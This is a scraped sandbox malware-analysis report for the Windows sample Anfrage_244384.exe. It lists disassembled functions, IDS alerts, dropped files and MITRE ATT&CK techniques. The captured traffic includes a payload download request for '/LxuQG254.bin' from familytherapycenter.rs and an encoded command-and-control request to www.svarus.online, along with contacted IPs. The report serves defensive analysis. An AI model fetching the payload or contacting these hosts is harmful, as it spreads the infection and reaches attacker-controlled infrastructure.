Opcode Fuzzy Hash: 389fa2244be355680aaae17d928d8adacd1a68415e3211b102cb5c9b5c75e932
Instruction Fuzzy Hash: 43215676A00119ABDB10DFA9C8509FEB7F8EF94684F540155FA45E3240F730EA11DBA1

Function 045BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046002BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046002E7
RTL: Re-Waiting, xrefs: 0460031E

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 5d9a71603457da7ab4b10ae4e8b07c22d5939b3d5e3d9fe92162540f71b8b6d6
Instruction ID: 35ec9aeb94e2e6fb05c8d40aae8188c8f393f6ac568948d6e5e59eb45b216896
Opcode Fuzzy Hash: 5d9a71603457da7ab4b10ae4e8b07c22d5939b3d5e3d9fe92162540f71b8b6d6
Instruction Fuzzy Hash: 94E19E316047429FD729CF28D884B6AB7E0BB88314F144A6DF8A5CB2D1E774F945DB82

Function 045CBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04607B7F
RTL: Resource at %p, xrefs: 04607B8E
RTL: Re-Waiting, xrefs: 04607BAC

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: e3ba4ec15343c4d3da4fa0df06d2f8386ea35469ff656792d26857dbbd170614
Instruction ID: 52da18c0cbbb94b5e1175478b791dac4a49e32280c496de5ea63a6a5d122e102
Opcode Fuzzy Hash: e3ba4ec15343c4d3da4fa0df06d2f8386ea35469ff656792d26857dbbd170614
Instruction Fuzzy Hash: 2F41DE317007029FD724DE69E841B6BB7E5FF88715F000A2DE95A9B780EB71F805AB91

Function 045CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0460728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04607294
RTL: Resource at %p, xrefs: 046072A3
RTL: Re-Waiting, xrefs: 046072C1

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 4a45ac9aa4be3f910d0e57d243ad5dbe140e3618817351ff27282fd60ea5bf1b
Instruction ID: a81383118e653fc319854791a388f30a14972bb001d73f8ccacbfbc84d6f9cf8
Opcode Fuzzy Hash: 4a45ac9aa4be3f910d0e57d243ad5dbe140e3618817351ff27282fd60ea5bf1b
Instruction Fuzzy Hash: 2341FE31704206AFD724DE64DC82F6AB7A5FF94715F144A2CF955AB280EB21F812ABD0

Function 04642300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0464238D
___swprintf_l.LIBCMT ref: 046423B3

Strings

]:%u, xrefs: 046423AA
%%%u, xrefs: 04642384

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 0532e0252e3751384e8b76ebd9fde826b37826730c0ad67a3ef7c3a4d10a4c9f
Instruction ID: 6eb8bbce3babf16ebfaef5710bb23c51c71fdfa76ae09fbb34e1f3c89b7aed43
Opcode Fuzzy Hash: 0532e0252e3751384e8b76ebd9fde826b37826730c0ad67a3ef7c3a4d10a4c9f
Instruction Fuzzy Hash: 1F3175726006199FDB21DF29CC50BAE77B8FB94750F54059AE849E3240FB30BA449F61

Function 045D7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 045D7E8B

Strings

-, xrefs: 045D7DDD
+, xrefs: 045D7DE8

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 5bb13d24846a39ea7bb232650d1656b04a9459db77430dd1e8c92bf004f110d6
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 45918470E002179BDF38DE6DD8816BEB7A5FF88724F54451AE865E72C0E730B941A760

Function 04599126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04599191
@, xrefs: 04599175

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: b0cb39ea5c6cfe05a3b73fd85a4c7ebaccd5294b99cc37cd3790e22790779fdd
Instruction ID: 285bb4dc47a57049d24791a3e4e53855a5e70fb39177a2934da025564ea3ed93
Opcode Fuzzy Hash: b0cb39ea5c6cfe05a3b73fd85a4c7ebaccd5294b99cc37cd3790e22790779fdd
Instruction Fuzzy Hash: D3810CB1D002699BDB35CB54CC44BEEB7B4BF48714F0045DAAA19B7640E7316E84EFA1

Function 0461CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0461CFBD

Strings

@, xrefs: 0461CF0A
@4Cw@4Cw, xrefs: 0461CFD5, 0461CFDA, 0461CFF1

Memory Dump Source

Source File: 00000007.00000002.3362901912.0000000004560000.00000040.00001000.00020000.00000000.sdmp, Offset: 04560000, based on PE: true

Associated: 00000007.00000002.3362901912.0000000004689000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.000000000468D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3362901912.00000000046FE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4560000_verclsid.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 731d3c07cfc24dfd6f2d5fa6837945f42aef05e3b8a2c97cd441fa120aa5f3f2
Instruction ID: d065786bbcac3a5da48a088f4d7dfc9ee8b1b5a8b1839408d8728f30989e30d8
Opcode Fuzzy Hash: 731d3c07cfc24dfd6f2d5fa6837945f42aef05e3b8a2c97cd441fa120aa5f3f2
Instruction Fuzzy Hash: 4E417C71A00215EFDB219FA9D840AAEBBB8FF94B04F04412AE915DB364F734F841DB61

Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 4x nop then xor eax, eax		7_2_003B9DF0
Source: C:\Windows\SysWOW64\verclsid.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_048B04E8

Source: Joe Sandbox View	IP Address: 188.40.95.144 188.40.95.144
Source: Joe Sandbox View	IP Address: 194.58.112.174 194.58.112.174

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49753
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.6:49926
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49927 -> 188.40.95.144:443

Source: global traffic	HTTP traffic detected: GET /LxuQG254.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sa87/?LJ=0zbXYrx&6X64=UqcT3NX6Xc6Oa5c5HtJN6Sm3jRGrdUDSppl2CYCGZerglEzU6CQj7u00+cYUshbCTVWQ/5Gc6Lshk9bP6yg8AmPqwLiPHc0f1bybms24K+7m7zNAaNQIZa1j2XstdwJ+GTV4HpA= HTTP/1.1Host: www.svarus.onlineAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: familytherapycenter.rs
Source: global traffic	DNS traffic detected: DNS query: www.svarus.online

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Anfrage_244384.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\02-E8420l

C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\nilgedde.mes

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\selefant.kri

C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes\speil.int

C:\Users\user\AppData\Roaming\secretaryships\Hemmeligt70.Bly

C:\Users\user\AppData\Roaming\secretaryships\Tingid.pig

C:\Users\user\AppData\Roaming\secretaryships\anya.por

C:\Users\user\AppData\Roaming\secretaryships\besiddertrang.gra

C:\Users\user\AppData\Roaming\secretaryships\darbyite.txt

C:\Users\user\AppData\Roaming\secretaryships\straffespark.Sek

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
Anfrage_244384.exe

Function 004031A3 Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Function 00404959 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481
windowmemoryCOMMON

Function 00405DE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Function 00405665 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Function 00403AD5 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 00403743 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402CFA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F33 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Function 004054A2 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre